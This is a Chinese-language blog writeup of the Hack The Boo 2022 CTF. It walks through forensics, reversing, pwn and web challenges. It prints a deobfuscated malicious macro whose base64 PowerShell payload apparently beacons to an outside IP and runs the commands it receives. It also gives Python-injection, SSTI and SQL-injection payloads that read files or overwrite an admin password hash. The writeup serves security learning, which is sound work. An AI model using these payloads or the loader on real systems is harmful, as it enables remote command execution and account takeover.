Hack The Boo 2022 CTF题目writeups
一个入门级的ctf比赛,网站链接:
https://ctf.hackthebox.com/event/details/hack-the-boo-637
Forensics
1.Halloween_Invitation
考点:
1.从文档中提取宏
2.对代码进行反混淆
解压zip后,可以得到一个文档,后缀名.docm的意思是,这个文档启用了宏,我们要把宏提取出来
这里使用olevba.py脚本来提取宏
https://github.com/decalage2/oletools/blob/master/oletools/olevba.py
下载好后直接运行
python3 olevba.py /home/kali/hacktheboo2022/forensics/halloween_invitation/invitation.docm
代码还被混淆了
我们将这些代码复制出来
写一个脚本来反混淆
#!/usr/bin/pythondef decodeAsHex(str):return "".join([chr(int(str[i:i+2],16)) for i in range(0, len(str), 2)])def decodeChar(str):return "".join([chr(int(s)) for s in str.split(' ')])def getBase64EncodedPayload():command = ""command = command + decodeChar(decodeAsHex("3734203635203636203132322036352036382034382036352037342031") + decodeAsHex("31392036352035312036352036382039392036352037362031303320363520353120363520363820383120363520373620313033"))command = command + decodeChar(decodeAsHex("363520313230203635203638203130") + decodeAsHex("37203635203739203635203635203131372036352036382038352036352037372031303320363520353420363520363820313033203635203737203635203635203532"))command = command + decodeChar(decodeAsHex("3635203638203635203635203734") + decodeAsHex("20313139203635203535203635203637203831203635203937203831203635203537203635203637203939203635203930203635203635203438203635203638203737"))command = command + decodeChar(decodeAsHex("3635203839203130332036362031303620363520373120373720363520373820313033203636203130372036352036") + decodeAsHex("37203438203635203737203635203635203438203635203638203737203635203930"))command = command + decodeChar(decodeAsHex("313033203635203132312036352036382038312036352037372036352036352035") + decodeAsHex("33203635203637203438203635203738203131392036362031303820363520373120363920363520373720313033203635"))command = command + decodeChar(decodeAsHex("313232203635203731203639203635203737203130332036362031303620363520363720393920363520373920313139203635203130372036352037322036352036352038302038312036352031") + decodeAsHex("3130203635"))command = command + decodeChar(decodeAsHex("373120313033203635203130302036352036362034382036352037322036352036352037392031303320") + decodeAsHex("36352031313820363520363720353620363520373420313139203635203535203635203637203831"))command = command + decodeChar(decodeAsHex("36352031303020313033203635203537203635203639203130372036352039382031303320363620353020363520373120353620363520393720313139203636203130382036352036372034") + decodeAsHex("38203635203835"))command = command + decodeChar(decodeAsHex("31303320363620313038203635203732203737203635203130302036352036362037382036352037312038352036352031303020363520363620313131203635203731203536203635203930") + decodeAsHex("203635203635"))command = command + decodeChar(decodeAsHex("313033203635203637203438203635203836203831203636203132322036352037312038") + decodeAsHex("35203635203831203130332036362031303420363520373220373720363520393720383120363620313036203635"))command = command + decodeChar(decodeAsHex("373020363520363520383920383120363620313231203635203732203737203635203937203831203636") + decodeAsHex("2031313720363520373120393920363520373320363520363520313136203635203730203835203635"))command = command + decodeChar(decodeAsHex("3939203130332036362031313220363520363720363520363520373420363520363620313139203635203637203831203635203939203131392036352031313820") + decodeAsHex("3635203731203831203635203738203635"))command = command + decodeChar(decodeAsHex("363520313232203635203731203733203635") + decodeAsHex("20383920313139203636203130362036352036382038392036352039302036352036352031303320363520363720343820363520383320363520363620313038"))command = command + decodeChar(decodeAsHex("36352037312036392036352039302036352036362031303820363520373220373320363520393920313139203635") + decodeAsHex("20313033203635203639203635203635203130312031313920363520313035203635203639"))command = command + decodeChar(decodeAsHex("363920363520313030203831203636203438203635203731203130332036352039") + decodeAsHex("38203131392036362031323120363520373120313037203635203130312031303320363620313034203635203732203831"))command = command + decodeChar(decodeAsHex("363520393720383120363620") + decodeAsHex("313138203635203731203532203635203733203130332036352035372036352036372038312036352039372038312036362035372036352036382031313520363520313030"))command = command + decodeChar(decodeAsHex("313139203636203131312036352037312031303720363520393820363520363620313038") + decodeAsHex("2036352036372036352036352037352036352036352031303720363520373220383120363520393920313033203636"))command = command + decodeChar(decodeAsHex("34392036352037312038352036352037352038312036362035352036352036372038312036352038392031313920363520353720363520363720313033203635203833203831203636203131") + decodeAsHex("37203635203732"))command = command + decodeChar(decodeAsHex("38392036352039382031313920363620313134203635203731203835203635203736203831203636203833") + decodeAsHex("20363520373120383520363520393920313139203636203438203635203639203438203635203930"))command = command + decodeChar(decodeAsHex("38312036362034382036352037312031303320363520393820313139203636203130372036352036372036352036352037362038312036362038362036352037322037") + decodeAsHex("37203635203930203831203636203637"))command = command + decodeChar(decodeAsHex("363520373120363920363520393920313139203636203131322036352037312037372036352038352036352036362031303420363520") + decodeAsHex("37322037332036352039392031313920363620313132203635203731"))command = command + decodeChar(decodeAsHex("35322036352039302031313920363520313033203635203637203438203635203836203831203636203132312036352037312031303720363520373320363520363520313037203635203732203635") + decodeAsHex("203635"))command = command + decodeChar(decodeAsHex("37342036352036362031323220363520363720") + decodeAsHex("35362036352037372036352036352034382036352036382037372036352039302031303320363520313231203635203638203831203635203737203635203635"))command = command + decodeChar(decodeAsHex("353320363520363720363520363520373620383120363620373320363520373120383520363520383920383120363620313037203635") + decodeAsHex("2037312038352036352039392031303320363620313232203635203637"))command = command + decodeChar(decodeAsHex("36352036352038312036352036362035352036352036372037332036352038") + decodeAsHex("3120383120363620343920363520373220383120363520393720363520363620313138203635203732203733203635203937"))command = command + decodeChar(decodeAsHex("383120363620353420363520373120363920363520") + decodeAsHex("313030203635203636203131322036352037312035362036352039382031303320363520313035203635203638203438203635203734203635203636"))command = command + decodeChar(decodeAsHex("31313220363520373220343820363520") + decodeAsHex("37352038312036352035352036352037312031303720363520393020313033203635203130332036352036372031303320363520373420363520363620313036203635"))command = command + decodeChar(decodeAsHex("3637") + decodeAsHex("20363520363520373620383120363620313137203635203731203835203635203733203635203635203131302036352036392035322036352039382031313920363620313137203635203731203835"))command = command + decodeChar(decodeAsHex("363520373420313139203635203131322036352036372036352036352031303120313139203635203130372036352037322037332036352038302038312036362031313220363520") + decodeAsHex("373120383520363520313031"))command = command + decodeChar(decodeAsHex("36352036352031303320") + decodeAsHex("363520363720383120363520383920313139203635203130332036352036372034382036352038322038312036362031323120363520373220373320363520393820313139203636"))command = command + decodeChar(decodeAsHex("3132312036352036392036392036352038392031313920363620343820363520373120313037203635203938203131392036362031313720363520") + decodeAsHex("363720363520363520383520313139203636203438203635"))command = command + decodeChar(decodeAsHex("3731203536203635203939203635203635203130332036352036372034382036352038322038312036362031323120") + decodeAsHex("36352037322037332036352039382031313920363620313231203635203730203839"))command = command + decodeChar(decodeAsHex("363520383920383120363620313231203635203731203130372036352038392038") + decodeAsHex("31203636203130352036352037312031313920363520393020383120363520313033203635203731203835203635203739"))command = command + decodeChar(decodeAsHex("3131392036352031303720363520373220373320363520383020383120") + decodeAsHex("3636203830203635203732203835203635203130302036352036352031313620363520373020373720363520313030203635203636"))command = command + decodeChar(decodeAsHex("3132312036352037") + decodeAsHex("31203130372036352039382031303320363620313130203635203637203635203635203736203831203636203734203635203731203532203635203939203635203636203439203635"))command = command + decodeChar(decodeAsHex("37322038312036352038342031313920363620313035203635203731203131312036352039302038312036362031303620363520373220383120363520373320363520363520313037203635203732") + decodeAsHex("203733"))command = command + decodeChar(decodeAsHex("3635203739203131392036352031303720363520373220383120363520383020383120363620") + decodeAsHex("373420363520373120353220363520313030203130332036362031313820363520373120313135203635203930"))command = command + decodeChar(decodeAsHex("38312036352031313620363520373020373320363520393020383120363620313232203635203732203831203635203834203831203636203130") + decodeAsHex("3820363520373220383120363520393720363520363620313138"))command = command + decodeChar(decodeAsHex("3635203731203831203635203733") + decodeAsHex("20363520363520313136203635203730203835203635203939203130332036362031313220363520363720363520363520373420363520363620313139203635203637"))command = command + decodeChar(decodeAsHex("3831203635203939203131392036352031313820363520363820393920363520393020383120363620313034203635203638203733203635203737203131392036362031303420363520363820373320") + decodeAsHex("3635"))command = command + decodeChar(decodeAsHex("38392031313920363520313033203635203637203438203635203834203831203636203130382036352037322038312036352039372036352036362031313820363520373120") + decodeAsHex("3831203635203733203635"))command = command + decodeChar(decodeAsHex("363620383120") + decodeAsHex("36352036392035362036352038352031313920363620383520363520363720363520363520373620383120363620373320363520373120383520363520383920383120363620313037203635"))command = command + decodeChar(decodeAsHex("37312038352036352039392031303320363620313232203635203637203635203635203831203635203636203535") + decodeAsHex("203635203637203733203635203831203831203636203439203635203732203831203635"))command = command + decodeChar(decodeAsHex("3937203635203636203131382036352037322037332036352039372038312036362035342036352037312036392036352031303020363520363620313132203635203731203536203635203938") + decodeAsHex("20313033"))command = command + decodeChar(decodeAsHex("3635203130352036352036382034382036352037342036352036362031313220363520373220343820363520373320363520363520") + decodeAsHex("3131362036352036392037332036352039382031313920363620313037"))command = command + decodeChar(decodeAsHex("363520373220") + decodeAsHex("3130372036352037332036352036352031313120363520373020313135203635203835203131392036362035332036352037322037372036352031303020363520363620313038203635203731"))command = command + decodeChar(decodeAsHex("3438203635") + decodeAsHex("203736203130332036362038352036352037312038352036352031303120363520363620343820363520363720353220363520383220383120363620313137203635203731203737203635203938"))command = command + decodeChar(decodeAsHex("3131392036362031303720363520373120313037203635203938203130332036362031313020363520373020343820363520373920313033203635203534203635203730203835203635") + decodeAsHex("203836203635203636"))command = command + decodeChar(decodeAsHex("37312036352036382031303320363520373620313033203636203732203635203731") + decodeAsHex("20383520363520313030203635203636203637203635203732203130372036352031303020363520363620313038203635"))command = command + decodeChar(decodeAsHex("3732203737203635203735203635203635203130372036352037312038352036352037352031313920363520313037203635203732203733203635203735203831203635") + decodeAsHex("20313033203635203637203438"))command = command + decodeChar(decodeAsHex("36352039372031303320363620") + decodeAsHex("3131382036352037312031303720363520393820313033203635203130332036352036372039392036352037332036352036352031313020363520363720313037203635"))command = command + decodeChar(decodeAsHex("313032") + decodeAsHex("20383120363520313033203635203732203737203635203938203635203636203130382036352037312038352036352039392036352036352031303320363520363820363520363520373620313033"))command = command + decodeChar(decodeAsHex("363520353220363520373220343820363520383320363520363620") + decodeAsHex("3835203635203639203733203635203130312031313920363520343920363520373220383520363520393920363520363520313232203635"))command = command + decodeChar(decodeAsHex("373220373320363520383820313139203635203132322036352036382038312036352037382038") + decodeAsHex("31203636203533203635203730203536203635203938203831203635203438203635203731203737203635"))return command + decodeChar(decodeAsHex("393920313033203635203131392036352036382038352036352031303220383120") + decodeAsHex("3635203631"))print(getBase64EncodedPayload())
运行脚本后,可以看到base64加密后的密文,我们解密
echo "JABzAD0AJwA3ADcALgA3ADQALgAxADkAOAAuADUAMgA6ADgAMAA4ADAAJwA7ACQAaQA9ACcAZAA0ADMAYgBjAGMANgBkAC0AMAA0ADMAZgAyADQAMAA5AC0ANwBlAGEAMgAzAGEAMgBjACcAOwAkAHAAPQAnAGgAdAB0AHAAOgAvAC8AJwA7ACQAdgA9AEkAbgB2AG8AawBlAC0AUgBlAHMAdABNAGUAdABoAG8AZAAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAIAAtAFUAcgBpACAAJABwACQAcwAvAGQANAAzAGIAYwBjADYAZAAgAC0ASABlAGEAZABlAHIAcwAgAEAAewAiAEEAdQB0AGgAbwByAGkAegBhAHQAaQBvAG4AIgA9ACQAaQB9ADsAdwBoAGkAbABlACAAKAAkAHQAcgB1AGUAKQB7ACQAYwA9ACgASQBuAHYAbwBrAGUALQBSAGUAcwB0AE0AZQB0AGgAbwBkACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwAgAC0AVQByAGkAIAAkAHAAJABzAC8AMAA0ADMAZgAyADQAMAA5ACAALQBIAGUAYQBkAGUAcgBzACAAQAB7ACIAQQB1AHQAaABvAHIAaQB6AGEAdABpAG8AbgAiAD0AJABpAH0AKQA7AGkAZgAgACgAJABjACAALQBuAGUAIAAnAE4AbwBuAGUAJwApACAAewAkAHIAPQBpAGUAeAAgACQAYwAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwB0AG8AcAAgAC0ARQByAHIAbwByAFYAYQByAGkAYQBiAGwAZQAgAGUAOwAkAHIAPQBPAHUAdAAtAFMAdAByAGkAbgBnACAALQBJAG4AcAB1AHQATwBiAGoAZQBjAHQAIAAkAHIAOwAkAHQAPQBJAG4AdgBvAGsAZQAtAFIAZQBzAHQATQBlAHQAaABvAGQAIAAtAFUAcgBpACAAJABwACQAcwAvADcAZQBhADIAMwBhADIAYwAgAC0ATQBlAHQAaABvAGQAIABQAE8AUwBUACAALQBIAGUAYQBkAGUAcgBzACAAQAB7ACIAQQB1AHQAaABvAHIAaQB6AGEAdABpAG8AbgAiAD0AJABpAH0AIAAtAEIAbwBkAHkAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAkAGUAKwAkAHIAKQAgAC0AagBvAGkAbgAgACcAIAAnACkAfQAgAHMAbABlAGUAcAAgADAALgA4AH0ASABUAEIAewA1AHUAcAAzAHIAXwAzADQANQB5AF8AbQA0AGMAcgAwADUAfQA=" | base64 -d
得到flag
HTB{5up3r_345y_m4cr05}
2.TrickOrBreach
考点:
1.DNS流量分析
双击打开流量包
发现都是dns的流量,通过strings工具发现了很多十六进制
我们把这些十六进制导出来
tshark -r capture.pcap -T fields -e dns.qry.name > a.txt
用文本编辑器把.pumpkincorp.com字符去掉
然后再用uniq工具将重复的字符串去掉
cat a.txt| uniq > b.txt
将十六进制转换为ascii码可以发现,这是一个Excel 文件
导入unzip模块就能找到flag
HTB{M4g1c_c4nn0t_pr3v3nt_d4t4_br34ch}
3.Wrong_Spooky_Season
考点:
1.流量分析
双击打开流量包
查看流量包协议分级
选择data数据
跟踪流量包可以发现一串base64密文
是倒转过来的,我们转回去即可
echo "==gC9FSI5tGMwA3cfRjd0o2Xz0GNjNjYfR3c1p2Xn5WMyBXNfRjd0o2eCRFS" | rev | base64 -d
得到flag
HTB{j4v4_5pr1ng_just_b3c4m3_j4v4_sp00ky!!}
或者直接用strings工具查看流量包里的字符串
strings capture.pcap
Reversing
1.Cult_Meeting
分析程序,发现是64位的,我们直接用ida来静态分析
char s[64]; // [rsp+0h] [rbp-40h] BYREFsetvbuf(_bss_start, 0LL, 2, 0LL);puts("\x1B[3mYou knock on the door and a panel slides back\x1B[0m");puts(asc_2040);fwrite("\"What is the password for this week's meeting?\" ", 1uLL, 0x30uLL, _bss_start);fgets(s, 64, stdin);*strchr(s, 10) = 0;if ( !strcmp(s, "sup3r_s3cr3t_p455w0rd_f0r_u!") ){puts("\x1B[3mThe panel slides closed and the lock clicks\x1B[0m");puts("| | \"Welcome inside...\" ");system("/bin/sh");}else{puts(" \\/");puts(asc_2130);}
if ( !strcmp(s, "sup3r_s3cr3t_p455w0rd_f0r_u!") )……system("/bin/sh");……
最关键的是if判断这里,他会将我们输入的字符和sup3r_s3cr3t_p455w0rd_f0r_u!字符串做比较。如果一样就会给我们一个shell
我们直接输入sup3r_s3cr3t_p455w0rd_f0r_u!即可
成功得到flag
HTB{1nf1ltr4t1ng_4_cul7_0f_str1ng5}
2.EncodedPayload
这是一个32位的程序,但是运行时什么也不输出,我们用strace来跟踪文件的系统调用
strace ./encodedpayload
成功得到flag
HTB{PLz_strace_M333}
3.Ghost_Wrangler
这是一个64位的程序,我们用ida打开来静态分析
const char *flag; // [rsp+8h] [rbp-8h]flag = (const char *)get_flag(argc, argv, envp);printf("%s\r|\x1B[4m%*.c\x1B[24m| I've managed to trap the flag ghost in this box, but it's turned invisible!\n""Can you figure out how to reveal them?\n",flag,40,95LL);return 0;
很简单的程序,他会把flag载入,到时候我们直接看程序的堆栈就好了
用gdb运行程序,我们在main函数地址处下一个断点,慢慢执行
在执行了call指令后,可以得到flag
HTB{h4unt3d_by_th3_gh0st5_0f_ctf5_p45t!}
4.Ouija
这是一个64位的程序,继续用ida打开来静态分析
在最上面可以看到一串奇怪的字符
然后对这个字符串进行了一些操作,通过分析,只是简单的置换字符串,我们使用ROT13就能得到flag
HTB{Adding_sleeps_to_your_code_makes_it_easy_to_optimize_later!}
5.Secured_transfer
有一个程序和流量包,我们双击打开流量包
只是几条tcp的交互,但是有一条带有FIN、PSH和ACK的流量,而且下面还有加密的数据字符串
5f558867993dccc99879f7ca39c5e406972f84a3a9dd5d48972421ff375cb18c
分析程序,发现是64位的,直接用ida打开分析
这个程序只是监听端口,然后传输文件的,但是在一个函数里,发现了加密的密钥
用AES解密就能得到flag
HTB{vryS3CuR3_F1L3_TR4nsf3r}
PWN
1.Pumpkin_Stand
打开ida,进行静态分析
首先打开了菜单,将我们的输入存入v3变量中,然后问我们需要多少个,将值存入v4里
然后pumpcoins数是减去我们输入的两个值的乘积,但是这行代码会导致整数溢出漏洞
当逻辑假定结果值将始终大于原始值时,软件执行的计算可能会产生整数溢出
如果我们输入1,就不会进入flag模块里,所以我们不能输入1
pumpcoins > 9998就会输出flag
运行程序
选择2
只要输入足够大的数字,就会触发漏洞,获得flag
获得flag
Web
1.Evaluation_Deck
访问网站,发现只是一个小游戏
启动burp,然后随便点击一张牌
在下面有一些参数,怪物的血量是100,我们-54
刷新网页,我们改一下造成的伤害试试
赢了,但是什么也没弹出来
通过分析源代码可以知道,我们可以利用operator参数来执行命令
\nimport subprocess as sp\nresult=sp.getoutput('cat ../flag.txt')\ny =
执行payload,获得flag
2.Spookifier
打开网站,有一个输入框,我们随便输入一些东西
他会获取我们的输入,然后再输出
通过分析源码可以发现
我们的输入直接传到了里面,没有经过检查,这样会导致ssti漏洞
我们测试一下存不存在ssti漏洞
漏洞存在,我们直接获取flag即可
${self.module.cache.util.os.popen("cat ../flag.txt").read()}
3.Horror_Feeds
去到网站上,发现是一个登录页面
我们分析一下源代码
只有当我们是admin用户登录的时候,才能看到源代码
我们输入的用户名直接带到数据库里查询了,这会造成sql注入
由于这个查询没有检查我们输入的字符串,我们将管理员的密码哈希更改为我们自己生成的哈希
密码是经过hash处理的,我们更改的密码也要生成这种hash值
然后注入username参数,更改管理员密码哈希值
{"username":"admin\",\"$2a$12$m5lXqzyKreZcVbB/sxR1rOJGbyo.7oHWwI83x8N31/LDCTNhzOhp2") ON DUPLICATE KEY UPDATE password=\"$2a$12$m5lXqzyKreZcVbB/sxR1rOJGbyo.7oHWwI83x8N31/LDCTNhzOhp2"#"}
更改成功,登录即可看到flag
4.Juggling_Facts
打开网站
只有右边这三个按键能用,点击secret facts按键,网站显示需要admin用户才能看
查看源代码
PHP有一个type juggling的功能,php在比较不同类型的变量时,会首先将它们转换为一个通用的可比较的类型
文章网站:
https://medium.com/swlh/php-type-juggling-vulnerabilities-3e28c4ed5c09
简单来说就是
"a"=="a" -> true
"a"==true -> true
我们直接发送true即可获得flag
Hack The Boo 2022 CTF题目writeups相关推荐
- [网络安全自学篇] 三十一.文件上传之Upload-labs靶场及CTF题目01-10(四)
这是作者的系列网络安全自学教程,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文分享了编辑器漏洞和IIS高版本文件上传漏洞,包括FCKeditor.eWeb ...
- ctf 监听端口_从一道ctf题目学到的绕过长度执行命令姿势 - 华域联盟|chu
参考:https://blog.csdn.net/calmegm/article/details/80874902 https://www.leavesongs.com/SHARE/some-tric ...
- angr-example(解CTF题目)
0x0 废话 emmm,总之就是官方给的examples啦.持续更新... 链接:https://docs.angr.io/examples 0x1 defcamp_r100 angr在CTF中最常见 ...
- 安卓逆向从入门到嗝屁之另一道CTF题目
小伙伴发了一道安卓的CTF题目,有空就看了下: 首先,这次就先不装了,开个模拟器卡的一P,androidkiller.gda等无法打开,jeb正常打开(当然dex2jar打开dex文件,再用jd-gu ...
- 2022 *CTF REVERSE的Simple File System
2022 *CTF REVERSE的Simple File System . . 下载附件,有四个文件: . . 照例扔入虚拟机中运行一下,查看主要回显信息: . . 照例扔入 IDA64 中查看伪代 ...
- 从一道CTF题目学习Tanner图和LDPC
概述 Tanner图是由Mr Tanner在1981在论文中提出来的,是研究低密度校验码的重要工具. Tanner图表示的是 LDPC 的校验矩阵.Tanner图中的循环是由图中的一群相互连接 ...
- CTF题目难度等级划分
CTF题目难度等级(1-10): 难度等级 描述 用途 例子 最大分值 1 赛题的考点是非常常见的,选手们对于此类赛题可以直接进行解题步骤,并且在较短的时间内得到正确答案.该难度下通常不需要利用额外的 ...
- cmd执行命令不等待返回值_从一道ctf题目学到的绕过长度执行命令姿势
0x01:linux中的 > 符号和 >> 符号 1.通过>来创建文件 >test.txtls 2.通过>将命令执行的结果存入文件中 echo "hell ...
- 攻防世界ctf题目easyupload做题笔记。
刚刷完upload-labs靶场,做做ctf题目,发现自己掌握的知识并不牢固.做了半天没有解出来,最后还是看别人的题解做出来的.写下做题过程,也就是wp吧.为了方便以后复习巩固. 本题的主要考点为利用 ...
最新文章
- 每天学一点儿shell:vi和vim命令使用
- Swing开发界面时的一个bug复盘
- Flume 1.6 遇Emoji表情发生截断丢失数据问题分析
- Uncaught TypeError: object is not a function
- 第七节:WebApi与Unity整合进行依赖注入和AOP的实现
- 玩转 SpringBoot 2.x 之自定义Starter依赖
- 9月20日等级考试试题答案实时追踪中
- 148. Sort List (java 给单链表排序)
- 计算机wind10切换桌面wind7系统,win10一键切回win7桌面方法_Win10桌面切换成Win7界面的方法...
- 集成电路布图设计独创性判断标准
- Tomcat免安装版+Eclipse配置
- f1c100s 源码_F1C100S 简易 boot 原理
- 详细讲解Socket服务器与多客户端的长链接通信(含Demo)
- Selenium隐藏“Chrome is being controlled by automated test software”
- HttpClient模拟登陆并获取指定页面的内容
- 钉钉应用开发服务器API错误码原因及解决方法
- 一度智信:如何提高自己的电商店铺权重
- 关于计算机图像基础知识的整理
- oracle spa性能测试,SPA for 11g 分析性能
- pytorch中同维度张量matmul运算